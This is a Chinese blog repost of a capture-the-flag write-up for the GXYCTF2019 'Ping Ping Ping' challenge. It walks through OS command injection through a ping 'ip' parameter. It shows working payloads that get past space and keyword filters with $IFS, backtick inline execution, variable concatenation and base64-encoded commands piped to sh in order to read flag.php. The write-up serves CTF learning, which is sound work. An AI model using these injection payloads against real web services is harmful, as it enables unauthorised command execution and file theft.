首页 > 其他 > 详细

[GXYCTF2019]Ping Ping Ping

时间:2020-09-24 10:17:51      阅读:42      评论:0      收藏:0      [点我收藏+]

打开题目,提示在 url 传入 ip 参数

技术分享图片

 

传入 127.0.0.1 发现服务器执行 ping 命令

技术分享图片

 

用分号拼接 linux 命令(顺便复习一下命令连接符分号是依次顺序执行;&&第一个命令成功第二个命令才会执行;||第一个命令成功第二个命令不执行,第一个命令失败第二个执行;|是命令1的正确输出作为命令2的操作对象)

技术分享图片

 

过滤了空格,$IFS$9 绕过后也无法直接读取 flag.php,先读一下 index.php(若不过滤的话,还有 ${IFS}、<、<> 等多种方式可以绕过过滤空格)

技术分享图片

 

payload1,内联执行,将反引号内命令的输出作为输入执行

/?ip=127.0.0.1;cat$IFS$1`ls`

技术分享图片

 

payload2,命令执行变量拼接

/?ip=127.0.0.1;a=g;cat$IFS$9fla$a.php

技术分享图片

 

payload3,过滤 flag、bash,用 sh 执行(Y2F0IGZsYWcucGhw 是 cat flag.php 的 base64-encode)

/?ip=127.0.0.1;echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh

技术分享图片

 

 

参考:

https://www.ghtwf01.cn/index.php/archives/273/

 

[GXYCTF2019]Ping Ping Ping

原文:https://www.cnblogs.com/wkzb/p/13721899.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!